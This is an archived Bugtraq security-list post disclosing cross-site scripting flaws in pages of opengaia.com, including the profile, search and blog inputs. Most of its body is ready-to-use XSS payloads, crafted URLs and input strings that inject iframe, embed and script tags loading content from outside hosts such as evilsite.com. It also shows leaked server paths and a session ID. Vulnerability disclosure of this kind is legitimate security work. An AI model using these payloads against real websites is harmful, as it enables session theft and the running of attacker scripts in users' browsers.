Opengaia.com - XSS Vuln & Session Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Opengaia.com - XSS Vuln & Session Include
From: luny@xxxxxxxxxxxxxxx
Date: 11 Jun 2006 05:51:38 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Opengaia.com

Homepage:
http://www.opengaia.com

Effected files:
my_page.php
module.php
editing your profile
the search input box
adding a diary/blog

------------------------------------

Just like in onlinenode.com's vulnerabilities, it seems this site filters data 
just about the same. Below is one way to create a XSS vuln by closing quotes 
and using an open ended iframe.

http://www.opengaia.com/my_page.php?viewed_id=6871";>'>'><iframe%20src=http://evilsite.com/scriptlet.html%20<<BR><BR>&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274

<embed> tags also workin each .php file. Example:

http://www.opengaia.com/my_page.php?viewed_id=6871''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">


Module.php XSS Vuln:

It seems with this code, we'll get a php error with full path disclosure and 
the xss won't work:

http://www.opengaia.com/modele.php?connection=1&name=%27%27%22%3C%22%27%3E%3Ciframe%2520src%3Dhttp%3A%2F%2Fevilsite.com%2Fscriptlet.html%2520%3C%5C

Warning: main(./): failed to open stream: Success in 
/home/user/public_html/modele.php on line 243

Warning: main(./): failed to open stream: Permission denied in 
/home/user/public_html/modele.php on line 243

Warning: main(): Failed opening './' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php') in 
/home/encoree/public_html/modele.php on line 243

Warning: main(./): failed to open stream: Permission denied in 
/home/user/public_html/modele.php on line 247

Warning: main(./): failed to open stream: Permission denied in 
/home/user/public_html/modele.php on line 247

Warning: main(): Failed opening './' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/

public_html/modele.php on line 247

modele.php XSS Vuln using iframe tag:

http://www.opengaia.com/modele.php?connection=1&name=%22%3E%27%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%22&password=&object_menu=&right=accueil.php&left=bienvenue.php&page=home&viewed_id=&fond=cccccc&langue=en&object_type=&filtre=

-------------------------------------

Editing your profile XSS with PHP Session included:

It seems the input boxes of editing your profile don't properlly filter user 
input before generating it. For a PoC example 

we will use end tags and put <script> tags to bypass this filter:

'>"><""><SCRIPT SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"">

Screenshots of PoC in action:

http://www.youfucktard.com/xsp/gaia2.jpg
http://www.youfucktard.com/xsp/gaia3.jpg
http://www.youfucktard.com/xsp/gaia3.jpg

-----------------------------------

Search input box XSS Vuln PoC:

in the search boxtry putting:
<iframe src=http://www.evilsite.com/scriptlet.html <

---------------------------------

Data isn't properly filtered when adding a diary/blog as well. for PoC try 
putting:

<iframe src=http://evilsite.com/scriptlet.html <

Prev by Date: tempnam() Bypass unique file name PHP 5.1.4
Next by Date: Foing (manage_songs.php) Remote File Inclusion[phpBB]
Previous by thread: tempnam() Bypass unique file name PHP 5.1.4
Next by thread: Foing (manage_songs.php) Remote File Inclusion[phpBB]
Index(es):
- Date
- Thread